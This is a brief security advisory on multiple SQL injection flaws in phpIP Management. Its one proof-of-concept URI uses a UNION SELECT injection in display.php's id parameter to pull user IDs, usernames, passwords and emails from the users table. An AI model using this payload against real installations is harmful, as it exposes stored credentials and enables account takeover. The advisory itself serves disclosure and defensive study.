phpIP Management Multiple SQL Injection Vulnerabilities

phpIP Management Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URI is available:

http://www.example.com/phpip/display.php?range=view&id=0%20UNION%20SELECT%20null,null,null,null,null,null,uid,username,password,email,null,null,null,null,null,null,null,null,null,null%20%20FROM%20users--&iprange=0&netid=0